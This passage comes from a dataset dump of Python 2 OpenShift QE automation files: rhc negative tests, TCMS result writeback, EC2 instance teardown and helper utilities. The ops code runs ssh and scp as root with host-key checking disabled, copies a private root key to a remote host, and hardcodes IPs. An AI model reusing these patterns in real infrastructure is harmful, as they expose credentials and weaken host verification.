os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n self.app_name=\"testapp\"\n tcms_testcase_id=122313,122349\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass ClientNegativeTesting(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"rhc domain create Negative Testing: Without namespace\",\n \"rhc domain create -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=[\"Missing required argument 'namespace'\"],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc domain update Negative Testing: Invalid namespace\",\n \"rhc domain update %s '$$%%##' -l %s -p %s %s\" % (self.domain_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Invalid namespace. Namespace must only contain alphanumeric characters'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Timeout Option Negative Testing: timeout value of string type\",\n \"rhc app create %s php-5.3 -l %s -p %s --timeout test %s --insecure\" %(self.app_name, self.user_email, self.user_passwd),\n expect_string_list=['invalid argument: --timeout test'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Without app name\",\n \"rhc app create -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Missing required argument \\'name\\''],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Invalid app name\",\n \"rhc app create '$#@*###' php-5.3 -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Invalid name specified'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Without app type\",\n \"rhc app create myapp -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Every application needs a web cartridge'],\n expect_return=\"!0\",\n )\n self.steps_list.append(step)\n\n\n if self.config.options.run_mode != 'DEV':\n step = testcase.TestCaseStep(\"rhc app create Negative Testing: Invalid app type\",\n \"rhc app create myapp php-test -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_string_list=['Invalid cartridge'],\n expect_return='!0'\n )\n self.steps_list.append(step)\n\n if self.config.options.run_mode != 'DEV':\n step = testcase.TestCaseStep(\"rhc app Negative Testing: non-existing application\",\n \"rhc app stop -a unexist -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Application unexist does not exist']\n #An application named \\'unexist\\' does not exist']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app Negative Testing: Invalid command\",\n \"rhc app haeel %s -l %s -p %s %s\" %(self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Too many arguments passed in.'], # XXX need to update testcase once bug is fixed\n )\n self.steps_list.append(step)\n\n step = 
testcase.TestCaseStep(\"rhc app Negative Testing: Without application\",\n \"rhc app show --state -l %s -p %s %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Missing required argument \\'app\\'.']\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc app Negative Testing: Without command\",\n \"rhc app -a %s -l %s -p %s %s\" %(self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['invalid option: -a'],\n )\n self.steps_list.append(step)\n\n if self.config.options.run_mode != 'DEV':\n step = testcase.TestCaseStep(\"'rhc snapshot save' Negative Testing: Invalid application\",\n \"rhc snapshot save -a unexist -l %s -p '%s' %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['Application unexist does not exist']\n )\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"'rhc snapshot save' Negative Testing: Without app\",\n \"rhc snapshot save -l %s -p %s -a %s\" %(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return='!0',\n expect_string_list=['missing argument: -a']\n )\n self.steps_list.append(step)\n# self.steps_list.append(laststep)\n\n case = testcase.TestCase(\"[rhc-client]negative testing of client command including invalid option and miss argument\\n[US1110][rhc-client]negative testing: give wrong value to --timeout option\",\n self.steps_list\n )\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ClientNegativeTesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.555435061454773, "alphanum_fraction": 0.557603657245636, "avg_line_length": 35.16666793823242, "blob_id": "c375790e5c1954ea1d3daa6065ed99c9de105302", "content_id": "68535f6ad2e1730e8e362756cb42dc0a5ae72585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3689, "license_type": "no_license", "max_line_length": 77, "num_lines": 102, "path": "/automation/tcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import time\nfrom nitrate import NitrateKerbXmlrpc\n\n\ntcmsproduction = 'https://tcms.engineering.redhat.com'\ntcmstest = 'https://tcms-test.app.eng.nay.redhat.com'\n\ntcmsurl = tcmsproduction\ntcms_server = NitrateKerbXmlrpc(tcmsurl + '/xmlrpc/').server\n\ndef create_run(plan_id):\n 'create new test run in TCMS'\n # get summary\n create_time = time.strftime('%Y-%m-%d %X', time.localtime())\n product_name = tcms_server.TestPlan.get(plan_id)['product']\n run_summary = product_name + '_' + 'automation' + '_' + create_time\n # get mananger id\n run_manager = tcms_server.TestPlan.get(plan_id)['owner_id']\n # get product id\n run_product = tcms_server.TestPlan.get(plan_id)['product_id']\n # get product version id\n run_product_version = \\\n tcms_server.TestPlan.get(plan_id)['product_version_id']\n # get build id\n run_build = tcms_server.Build.create(\n {'product': 243, 'name': create_time})['build_id']\n # get plan id\n run_plan_id = plan_id\n # get cases id list\n cases = tcms_server.TestCase.filter(\\\n {'plan__plan_id': 
plan_id, 'case_status__name': 'CONFIRMED'})\n    cases_id = [case['case_id'] for case in cases]\n    run_case = cases_id\n    # create test run\n    run_values = {\n        'summary': run_summary,\n        'manager': run_manager,\n        'product': run_product,\n        'product_version': run_product_version,\n        'build': run_build,\n        'plan': run_plan_id,\n        'case': run_case\n    }\n    try:\n        run_id = tcms_server.TestRun.create(run_values)['run_id']\n    except Exception, error_info:\n        print 'Maybe you have no permission to create the run, \\\n            or maybe your run_values are wrong. \\\n            detail error info is as follows, \\n %s' % error_info\n    return run_id\n\n\ndef get_caserun_id(run_id, case_id):\n    \"\"\"\n    get case-run-id via run-id and case-id.\n    \"\"\"\n    # same lookup that update_caserunstatus() uses below\n    caserunid = tcms_server.TestCaseRun.filter(\\\n        {'run__run_id': run_id, \\\n        'case__case_id': case_id})[0]['case_run_id']\n    return caserunid\n\ndef update_caserunstatus(run_id, tcms_results):\n    'update the result of automation in TCMS test-run'\n    # get caserun id\n    plan_id = tcms_server.TestRun.get(run_id)['plan_id']\n    allcases = tcms_server.TestPlan.get(plan_id)['case']\n    for result in tcms_results:\n        caserun_result = result['case_status']\n        if caserun_result == 'pass':\n            caserun_status = 2\n        elif caserun_result == 'fail':\n            caserun_status = 3\n        elif caserun_result == 'error':\n            caserun_status = 7\n        case_name = result['case_name']\n        if case_name.startswith('ID'):\n            case_id = int(case_name.split('_')[1])\n        else:\n            print 'case: %s: name does not start with \"ID\"!' % case_name\n            continue\n        if case_id in allcases:\n            try:\n                caserun_id = tcms_server.TestCaseRun.filter(\\\n                    {'run__run_id': run_id, \\\n                    'case__case_id': case_id})[0]['case_run_id']\n            except Exception, filter_error:\n                print 'case: %d cannot be found in the new run.' % case_id\n                print 'detail error info is as follows, \\n %s' % filter_error\n                continue\n            else:\n                try:\n                    tcms_server.TestCaseRun.update(\\\n                        caserun_id, {'case_run_status': caserun_status})\n                except Exception, update_error:\n                    print 'caserun status updating failed!'\n                    print 'detail info is as follows, \\n %s' % update_error\n                    continue\n        else:\n            continue\n    print 'Test result writeback finished!'\n" }, { "alpha_fraction": 0.5870007276535034, "alphanum_fraction": 0.5934610366821289, "avg_line_length": 39.10619354248047, "blob_id": "5c42be0cbe67f7e2e0a9c959abc23d9a9dfbc988", "content_id": "9b0e071b4ddabec2e8aa01e9e3ac7d3b62ae6583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9064, "license_type": "no_license", "max_line_length": 181, "num_lines": 226, "path": "/automation/open/bin/posttestingjob.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nimport commands\nimport subprocess\nimport re\nimport yaml\nimport random\nimport string\nimport fcntl\nimport pymongo\nfrom urllib import quote, unquote\nfrom pymongo.errors import *\nfrom bson.objectid import ObjectId\n\nSCRIPT_PATH = os.path.abspath(os.path.dirname(__file__))\n\nclass DotDict(object):\n\n    def __getattr__(self, name):\n        return self.data[name]\n\n    def __setattr__(self, name, value):\n        if not self.__dict__.has_key('data'):\n            self.__dict__['data'] = {}\n        self.__dict__['data'][name] = value\n\n\nclass DefaultValueDict(dict):\n    DEFAULT = {'instance_count' : 1, 'job_count' : 2}\n\n    def __getitem__(self, key):\n        if not self.has_key(key):\n            return DefaultValueDict.DEFAULT\n        else:\n            return super(DefaultValueDict, self).__getitem__(key)\n\n\nclass PostTestingJob(object):\n    KEY_PATH = os.path.join(SCRIPT_PATH, '..', 'etc', 'libra.pem')\n    IP_ADDR = '184.73.182.48'\n    TESTPLAN_ID = '4962'\n\n    def 
__init__(self):\n        # Change key file permission\n        os.system(\"chmod 600 %s\" % (PostTestingJob.KEY_PATH))\n        # Setup environment variables\n        os.environ['RHTEST_HOME'] = os.path.abspath(os.curdir)\n        os.environ['PATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PATH'))\n        os.environ['PYTHONPATH'] = os.path.expandvars(os.path.expanduser('${RHTEST_HOME}/bin:${RHTEST_HOME}/lib:${RHTEST_HOME}/lib/supports:${RHTEST_HOME}/testmodules:$PYTHONPATH'))\n        # Init kerberos\n        cmd = 'cd bin/ && ./kinit.sh'\n        if os.system(cmd) != 0:\n            print 'Failed to init kerberos. Please check your TCMS_USER and TCMS_PASSWORD'\n            sys.exit(255)\n        # Init parameters\n        self.init_params()\n        if not self.preprocess():\n            sys.exit(255)\n        # Connect to local mongodb\n        mongo_url = os.environ['MONGO_CONN_URL']\n        try:\n            self.conn = pymongo.Connection('mongodb://%s' % (mongo_url))\n        except ConnectionFailure:\n            print 'Error: Failed to connect to MongoDB at %s. Please check your system configuration.' % (mongo_url)\n            sys.exit(255)\n        self.db = self.conn['devenv']\n        # Remove inactive instances\n        self.check_existing_instances()\n\n    def __del__(self):\n        # Disconnect from MongoDB\n        if hasattr(self, 'conn'):\n            self.conn.close()\n\n    def init_params(self):\n        self.config = DotDict()\n        self.param_list = ['INSTANCE_TAG', 'INSTANCE_IP', 'BUILD_UUID', 'SHUTDOWN_INSTANCE', 'TCMS_USER', 'TCMS_PASSWORD']\n        for param in self.param_list:\n            setattr(self.config, param.lower(), os.environ.get(param))\n\n    def strip_params(self):\n        for parameter in self.param_list:\n            value = getattr(self.config, parameter.lower())\n            if value != None:\n                value = value.strip()\n            if value != '':\n                setattr(self.config, parameter.lower(), value)\n            else:\n                setattr(self.config, parameter.lower(), None)\n        return True\n\n    def preprocess(self):\n        if not self.strip_params():\n            print 'Failed to strip parameters'\n            return False\n        if self.config.shutdown_instance == 'false':\n            return True\n        elif self.config.shutdown_instance == 'true':\n            if self.config.instance_ip and self.config.instance_tag and self.config.build_uuid:\n                return True\n            else:\n                print 'INSTANCE_IP, INSTANCE_TAG and BUILD_UUID are needed to shutdown instance'\n                return False\n        else:\n            print 'SHUTDOWN_INSTANCE can only be one of true/false'\n            return False\n\n    def remove_instance(self, tag, ip):\n        cursor = self.db.instances.find({'tag':tag, 'ip':ip})\n        if cursor.count() <= 0:\n            print 'Instance %s(%s) is not in MongoDB' % (tag, ip)\n            return False\n        elif cursor.count() > 1:\n            print 'Error: Multiple instances with the same tag and ip found. Please debug.'\n            return False\n        instance = cursor[0]\n        if instance['user_count'] > 0:\n            print 'Instance %s(%s) is still being used by %d builds: %s' % (tag, ip, instance['user_count'], instance['users'])\n            print 'No need to shutdown it'\n            return True\n        elif instance['user_count'] < 0:\n            print 'Error: The user_count of instance is less than 0. 
Something wrong happened.'\n return False\n # Shutdown instance\n print 'Going to shutdown instance: %s(%s)' % (tag, ip)\n ret = 1\n for i in range(3):\n ret = self.shutdown_instance_by_ip(ip)\n if ret == 0:\n break\n if tag != ip and ret != 0:\n for i in range(3):\n ret = self.shutdown_instance_by_tag(tag)\n if ret == 0:\n break\n if ret != 0:\n print 'Failed to shutdown instance %s(%s)' % (tag, ip)\n return False\n # Remove instance from MongoDB\n try:\n self.db.instances.remove({'tag' : tag, 'ip' : ip, 'user_count' : 0}, safe=True)\n except OperationFailure, e:\n print 'Error: Failed to remove instance from mongodb\\n', e\n return False\n return True\n\n def disuse_instance(self, build_uuid, tag, ip, value=-1):\n cursor = self.db.instances.find({'tag':tag, 'ip':ip, 'users':build_uuid})\n if cursor.count() == 1:\n instance = cursor[0]\n if build_uuid not in instance['users']:\n print 'instance %s(%s) is not being used by user: %s' % (tag, ip, build_uuid)\n return True\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$inc' : {'user_count' : value}})\n self.db.instances.update({'_id':ObjectId(instance['_id'])}, {'$pull' : {'users' : build_uuid}})\n return True\n elif cursor.count() <= 0:\n print 'Error: No such instance found: %s(%s)' % (tag, ip)\n return False\n else:\n print 'Error: Multiple instances found: %s(%s). Please check.' % (tag, ip)\n return False\n\n def shutdown_instance_by_tag(self, tag):\n if tag in ['int.openshift.redhat.com', 'stg.openshift.redhat.com']:\n print \"We can't shutdown stage or int instance\"\n return 0\n cmd = \"python bin/shutdown_instance.py -n '%s'\" % (tag)\n return subprocess.call(cmd, shell=True)\n\n def shutdown_instance_by_ip(self, ip, timeout=10):\n if ip in ['int.openshift.redhat.com', 'stg.openshift.redhat.com']:\n print \"We can't shutdown stage or int instance\"\n return 0\n cmd = \"ssh -t -t -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=%d -t root@%s \\\"shutdown -h now\\\"\" % (PostTestingJob.KEY_PATH, timeout, ip)\n return subprocess.call(cmd, shell=True)\n\n def check_instance(self, ip, retry=2, timeout=20):\n cmd = \"ssh -t -t -i %s -o StrictHostKeyChecking=no -o ConnectTimeout=%d root@%s \\\"ls\\\"\" % (PostTestingJob.KEY_PATH, timeout, ip)\n for i in range(retry):\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n return True\n return False\n\n def check_existing_instances(self, retry=2, timeout=20):\n cursor = self.db.instances.find()\n for instance in cursor:\n print 'Checking instance: %s' % (instance['ip'])\n if instance['ip'] in (\"int.openshift.redhat.com\", \"stg.openshift.redhat.com\"):\n print 'No need to check stage or INT server'\n elif self.check_instance(instance['ip'], retry=2, timeout=20):\n print 'Instance %s is Active' % (instance['ip'])\n else:\n print 'Failed to ssh connect instance: %s. Remove it from MongoDB.' 
% (instance['ip'])\n try:\n self.db.instances.remove(instance['_id'], safe=True)\n except OperationFailure, e:\n print 'Warning: failed to remove inactive instance %s(%s) from MongoDB.\\n%s' % (instance['tag'], instance['ip'], e)\n\n def start(self):\n if self.config.shutdown_instance == 'true':\n if not self.disuse_instance(self.config.build_uuid, self.config.instance_tag, self.config.instance_ip):\n sys.exit(1)\n if not self.remove_instance(self.config.instance_tag, self.config.instance_ip):\n sys.exit(2)\n sys.exit(0)\n\n\nclass UnitTest(PostTestingJob):\n def __init__(self):\n super(UnitTest, self).__init__()\n\n def shutdown_instance_by_tag(self, tag):\n print 'Instance(tag: %s) has been shutdown' % (tag)\n return 0\n\n def shutdown_instance_by_ip(self, ip):\n print 'Instance(ip: %s) has been shutdown' % (ip)\n return 0\n\n\nif __name__ == '__main__':\n job = PostTestingJob()\n job.start()\n" }, { "alpha_fraction": 0.6684824824333191, "alphanum_fraction": 0.675680935382843, "avg_line_length": 25.479381561279297, "blob_id": "4e0123cd5edef3e4e750f90f8aa769584378ef43", "content_id": "fff33c862fe5a7e1c108ece59572a7ace1c52edb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5140, "license_type": "no_license", "max_line_length": 83, "num_lines": 194, "path": "/automation/open/lib/supports/XML/xmltools.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python -i\n\n\"\"\"\nSome convenience classes and functions for dealing with XML files.\n\n\"\"\"\n\nimport sys\nfrom xml.dom import minidom\n\nclass XMLDocument(object):\n\t\"\"\"\nXMLDocument(docname)\nA wrapper class for the xml.minidom.Document. This delegates to that\nclass, and also adds functionality more convenient for automation\npurposes.\n\t\"\"\"\n\tdef __init__(self, filename=None):\n\t\tif filename is not None:\n\t\t\tself.get_document(filename)\n\t\telse:\n\t\t\tself.document = None\n\t\t\tself.filename = None\n\t\tself.dirty = 0\n\t\tself.xmldict = None # cache the xml dictionary if we use it once\n\t\n\tdef set_dirty(self, val=1):\n\t\tself.dirty = val\n\n\tdef get_document(self, filename):\n\t\tself.document = minidom.parse(filename)\n\t\tself.filename = filename\n\t\tself.dirty = 0\n\t\treturn self.document\n\n\tdef write_xmlfile(self, filename=None):\n\t\tif filename is None:\n\t\t\tfilename = self.filename\n\t\tfo = open(filename, \"w\")\n\t\tself.document.writexml(fo)\n\t\tfo.close()\n\t\tself.dirty = 0\n\n#\tdef __del__(self):\n#\t\tif self.filename and self.dirty:\n#\t\t\tself.write_xmlfile()\n\n\tread = get_document\n\twrite = write_xmlfile\n\n\tdef writexml(self, writer):\n\t\tself.document.writexml(writer)\n\n\t# dictionaries have a more convenient access to nodes. \n\tdef get_xml_dict(self):\n\t\tif self.xmldict:\n\t\t\treturn self.xmldict\n\t\t# else\n\t\txmldict = {}\n\t\t_get_dict_helper(self.document.childNodes[0], \n\t\t\t\tnode2string(self.document.childNodes[0]), xmldict)\n\t\tself.xmldict = xmldict\n\t\treturn xmldict\n\n\tdef get_path(self, node, choplevel=0):\n\t\treturn node2path(node, choplevel)\n\n\tdef get_node(self, path):\n\t\t\"\"\"\nget_node(path)\nFind a particular node, given a pathname. 
\n\n\t\t\"\"\"\n\t\txmldict = self.get_xml_dict()\n\t\tnodelist = path.split(\"/\")\n\t\tif not nodelist[0]: # remove leading empty string, if present\n\t\t\tdel nodelist[0]\n\t\tfor nodename in nodelist[:-1]:\n\t\t\tdictval = xmldict.get(nodename, None)\n\t\t\tif dictval is None:\n\t\t\t\traise ValueError, \"XMLDocument.get_node: element not found: %s\" % nodename\n\t\t\tif type(dictval) is type(self.__dict__): # check for nested DictType\n\t\t\t\txmldict = dictval\n\t\t\telse:\n\t\t\t\traise ValueError, \"XMLDocument.get_node: Non-terminal node\"\n\t\ttry:\n\t\t\treturn xmldict[nodelist[-1]]\n\t\texcept KeyError:\n\t\t\traise ValueError, \"XMLDocument.get_node: element not found: %s\" % (nodelist[-1])\n\n\t\t\n\tdef set(self, path, value):\n\t\tnode= self.get_node(path)\n\t\tif hasattr(node, \"childNodes\"):\n\t\t\tif node.childNodes: \n\t\t\t\ttextnode = node.childNodes[0] # minidom has a strange API...\n\t\t\t\ttextnode.deleteData(0, textnode.length)\n\t\t\t\ttextnode.appendData(str(value))\n\t\t\telse: # no existing value node, so add one\n\t\t\t\tnode.appendChild(minidom.Text(str(value)))\n\t\t\tself.dirty = 1\n\t\telse:\n\t\t\traise ValueError, \"XMLDocument.set: invalid path\"\n\t\n\tdef dump_paths(self, fo):\n\t\tdef cb(node):\n\t\t\tfo.write(\"%s = %s\\n\" % (node2path(node), node2string(node)))\n\t\tnode_walker(self.document, cb)\n\t\t# XXX this needs work\n\n\n#########################################################\n# Utility functions\n#########################################################\n\ndef node2string(node):\n\tif node.nodeType == minidom.Node.ELEMENT_NODE:\n\t\tif node.hasAttributes():\n\t\t\ts = map(lambda i: \"@%s='%s'\" % (i[0],i[1]), node._get_attributes().items())\n\t\t\treturn \"%s[%s]\" % (node.tagName, \" and \".join(s))\n\t\telse:\n\t\t\treturn node.tagName\n\telif node.nodeType == minidom.Node.TEXT_NODE:\n\t\treturn str(node.data)\n\telif node.nodeType == minidom.Node.DOCUMENT_NODE:\n\t\treturn \"\" # the document is the root\n\telse:\n\t\treturn str(node)\n\n\ndef node_walker(startnode, callback, stoptype=minidom.Node.TEXT_NODE):\n\tfor node in startnode.childNodes:\n\t\tif node.nodeType == stoptype:\n\t\t\tcallback(node)\n\t\telif node.nodeType == minidom.Node.ELEMENT_NODE:\n\t\t\tnode_walker(node, callback, stoptype)\n\n\ndef node2path(node, choplevel=0):\n\ts = [node2string(node)]\n\twhile node.parentNode:\n\t\tnode = node.parentNode\n\t\ts.insert(0, node2string(node))\n\treturn \"/\".join(s[choplevel:])\n\t\n\n### internal helper functions\n\ndef _find_node_helper(node, name):\n\tellist = node.getElementsByTagName(name)\n\treturn ellist\n\ndef _getElementsByTagNameHelper(parent, name, rc):\n\tfor node in parent.childNodes:\n\t\tif node.nodeType == Node.ELEMENT_NODE and \\\n\t\t\t(name == \"*\" or node.tagName == name):\n\t\t\trc.append(node)\n\t\t_getElementsByTagNameHelper(node, name, rc)\n\treturn rc\n\n# recursive function to help build nested dictionaries\ndef _get_dict_helper(parent, name, dict):\n\tnewdict = {}\n\tfor node in parent.childNodes:\n\t\tif node.nodeType == minidom.Node.ELEMENT_NODE:\n\t\t\tnodename = node2string(node)\n\t\t\tnewdict[nodename] = node\n\t\t\t_get_dict_helper(node, nodename, newdict)\n\tif newdict:\n\t\tdict[name] = newdict\n\treturn dict\n\n\n\n# self test\nif __name__ == \"__main__\":\n\timport sys\n\targc = len(sys.argv)\n\tif argc < 2:\n\t\tprint \"\"\"xmltools <xmlfile> [<pathname>] [<newvalue>]\n\t\tif <xmlfile> given, print path names for file.\n\t\tif <pathname> also given, print value of that node.\n\t\tif 
<newvalue> also given, write new file with node changed to that value.\n\t\t\"\"\"\n\t\tsys.exit(1)\n\tdoc = XMLDocument(sys.argv[1])\n\tif argc == 2:\n\t\tdoc.dump_paths(sys.stdout)\n\telif argc == 3:\n\t\tnode = doc.get_node(sys.argv[2])\n\t\tprint node\n\telif argc >= 4:\n\t\tdoc.set(sys.argv[2], sys.argv[3])\n\t\tdoc.write_xmlfile()\n\n\n\n" }, { "alpha_fraction": 0.5870007276535034, "alphanum_fraction": 0.5934610366821289, "avg_line_length": 34.7899055480957, "blob_id": "2992cdcaae6f8a4121c5b058dded584e872875d9", "content_id": "843b9f76d1efd62794247b061afa957c07eb8f3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30494, "license_type": "no_license", "max_line_length": 357, "num_lines": 852, "path": "/automation/open/lib/helper.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport aws_console\nimport uuid\nimport subprocess\nimport commands\nimport os\nimport json\nimport re\nimport random\nimport string\nimport paramiko\nimport time\nimport sys\nimport signal\nimport clog\nimport base64\nfrom optparse import OptionParser\n\nexpress_conf_file = \"%s/.openshift/express.conf\" %(os.environ['HOME'])\nglobal_express_conf_file = \"/etc/openshift/express.conf\"\nCOMMAND_TIMEOUT=1200 #seconds to wait to kill never ending subprocesses\n\nlog = clog.get_logger()\nparser = OptionParser()\n\n\ndef get_default_rhlogin():\n if not os.getenv('OPENSHIFT_user_email') or not os.getenv('OPENSHIFT_user_passwd'):\n log.error(\"Please check these ENV var: OPENSHIFT_user_email OPENSHIFT_user_passwd\")\n raise Exception(\"Environment Variables OPENSHIFT_* Not Found.\")\n return (os.getenv('OPENSHIFT_user_email'), os.getenv('OPENSHIFT_user_passwd'))\n\n\n# helper function for to measure timedelta.\ndef timeit(method):\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n\n log.debug(\"%r (%r, %r) %2.2f sec\" % (method.__name__, args, kw, te-ts))\n return result\n\n return timed\n\nclass Alarm(Exception):\n pass\n\nclass TimeoutError(Exception):\n pass\n\nclass MercyException(Exception):\n pass\n\n\n@timeit\ndef create_node(instance_tag, image_name=None, image_size=\"m1.medium\"):\n aws_obj = aws_console.AWS_Console()\n if image_name == None:\n image_dict = aws_obj.get_all_devenv_images()\n target_image = image_dict[max(sorted(image_dict))]\n image_name = target_image.name.split('/')[1]\n if instance_tag == None:\n instance_tag=\"QE_auto_%s_%s\" %(image_name, uuid.uuid1().hex[:6])\n elif not instance_tag.startswith(\"QE_\"):\n instance_tag=\"QE_%s\" %(instance_tag)\n log.info(\"Instance tag: %s\"%instance_tag)\n log.info(\"Image size: %s\"%image_size)\n image = aws_obj.get_filtered_image(image_name)\n node = aws_obj.create_node(instance_tag, image, image_size)\n log.info(\"instance_ip=%s\" %(node.public_ip[0]))\n log.info(\"instance_name=%s\" %(instance_tag))\n return node.public_ip[0]\ncreate_broker=create_node #alias\n\n\ndef get_public_ip(private_ip):\n # curl http://169.254.169.254/latest/meta-data/local-ipv4\n ssh_options = \"-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \"\n cmd = \"scp %s %s root@%s: \"%(ssh_options, get_root_ssh_key_(), get_instance_ip())\n (ret, output) = cmd_get_status_output(cmd, quiet=True)\n if ret != 0:\n log.error(\"Unable to copy private key to broker\")\n return None\n\n key_name = get_root_ssh_key_().split('/')[-1]\n cmd = [\"curl -k -s -X GET http://169.254.169.254/latest/meta-data/public-ipv4 2>/dev/null\",\n 
\"rm -f %s\"%key_name]\n (ret, output) = rcmd_get_status_output2(\"ssh %s -i ./%s root@%s %s 2>/dev/null\"%(\n ssh_options,\n key_name, \n private_ip, \n \";\".join(cmd)))\n if ret==0:\n obj = re.search(\"([^\\s]+)$\",output)\n if obj:\n return obj.group(1)\n else:\n return None\n else:\n log.error(\"Unable to determine public IP address from %s\"%private_ip)\n return None\n\n\ndef get_internal_hostname(public_ip):\n pass\n\n\ndef get_private_ip(public_ip):\n \"\"\"\n Returns internal EC2 IP address by internal http request to 169.254.169.254\n \"\"\"\n cmd = \"curl -k -s -X GET http://169.254.169.254/latest/meta-data/local-ipv4 2>/dev/null\"\n private_ip=None\n (ret, output) = rcmd_get_status_output2(cmd, host=public_ip)\n if ret==0:\n obj = re.search(\"([^\\s]+)$\",output)\n if obj:\n private_ip = obj.group(1)\n\n if private_ip is None:\n log.error(\"Unable to determine private IP address from %s: %s\"%(public_ip,output))\n\n return private_ip\n\n\ndef add_node(instance_tag, image_name=None, image_size=\"m1.medium\", broker_ip=None):\n \"\"\"\n Node: Commands are copied from li/devenv script\n \"\"\"\n broker = {}\n if broker_ip is None:\n broker['internal_ip'] = get_private_ip(get_instance_ip())\n else:\n broker['internal_ip'] = get_private_ip(broker_ip)\n\n log.debug(\"Private broker's IP = %(internal_ip)s\"%broker)\n #modify the broker...\n log.debug(\"Modifying the broker\")\n ssh_cmd = [ \"sed -i 's,^plugin.qpid.host.ha.*=.*,plugin.qpid.host.ha=%(internal_ip)s,' /etc/mcollective/client.cfg\"%broker,\n \"sed -i 's,^plugin.qpid.host.ha.*=.*,plugin.qpid.host.ha=%(internal_ip)s,' /etc/mcollective/server.cfg\"%broker,\n \"sed -i 's,^ssl-cert-name.*=.*,ssl-cert-name=%(internal_ip)s,' /etc/qpidd.conf\"%broker,\n \"sed -i 's,^server_id.*=.*,server_id=%(internal_ip)s,' /etc/openshift/devenv/qpid/make-certs.sh\"%broker,\n \"sed -i 's,^owner_domain_name.*=.*,owner_domain_name=%(internal_ip)s,' /etc/openshift/devenv/qpid/make-certs.sh\"%broker,\n \"sed -i 's,^#-A,-A,' /etc/sysconfig/iptables\",\n \"sed -i 's,^BROKER_HOST.*=.*,BROKER_HOST=%(internal_ip)s,' /etc/openshift/node.conf\"%broker,\n \"cd /etc/openshift/devenv/qpid/\",\n \"./make-certs.sh\",\n \"/bin/cp test/client_db/* /etc/qpid/pki/client_db/; /bin/cp test/server_db/* /etc/qpid/pki/server_db/\",\n \"restorecon -R /etc/qpid/pki/\",\n \"chmod +r /etc/qpid/pki/client_db/* /etc/qpid/pki/server_db/*\",\n \"service iptables restart\",\n \"service activemq restart\",\n \"service mcollective restart\"]\n (ret, output) = rcmd_get_status_output(\" ; \".join(ssh_cmd), quiet=False)\n #ret = 1\n if ret != 0:\n log.error(\"Interrupted: Unable to modify broker for multi node setup.\")\n return 1\n #do setup for new node\n #new_node_public_ip = create_node(instance_tag, image_name, image_size)\n new_node_public_ip='23.20.68.196'\n log.debug(\"Modifying new node setup... 
